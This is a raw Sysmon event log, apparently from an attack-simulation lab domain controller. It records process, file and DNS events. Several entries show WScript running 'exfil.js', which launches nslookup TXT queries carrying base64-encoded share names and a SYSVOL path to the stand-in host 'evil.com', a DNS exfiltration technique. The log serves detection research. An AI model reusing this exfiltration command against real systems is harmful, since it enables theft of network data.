14:21:34.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.944{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-2044-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.944{2E1864BB-18E0-629A-6742-000000005F02}39767340C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-2044-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{2E1864BB-18EE-629A-2044-000000005F02}4936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltnyj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.944{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltsa.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-18EE-629A-1E44-000000005F02}75927864C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1F44-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1F44-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.928{2E1864BB-18EE-629A-1D44-000000005F02}24282132C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-1F44-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.933{2E1864BB-18EE-629A-1F44-000000005F02}5960C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-1D44-000000005F02}2428C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltsa.tmp 2>&1 10341000x8000000000000000210090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.913{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1E44-000000005F02}7592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.913{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1E44-000000005F02}7592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.913{2E1864BB-18EE-629A-1E44-000000005F02}75927864C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1D44-000000005F02}2428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1E44-000000005F02}7592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1D44-000000005F02}2428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.897{2E1864BB-18E0-629A-6742-000000005F02}39768048C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-1D44-000000005F02}2428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.899{2E1864BB-18EE-629A-1D44-000000005F02}2428C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltsa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.881{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlixvuv.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-18EE-629A-1B44-000000005F02}81885012C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1C44-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000210077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.050{00000000-0000-0000-0000-000000000000}4616evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.977{00000000-0000-0000-0000-000000000000}3360evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.917{00000000-0000-0000-0000-000000000000}2900evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.855{00000000-0000-0000-0000-000000000000}6932evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.790{00000000-0000-0000-0000-000000000000}2872evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000210072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 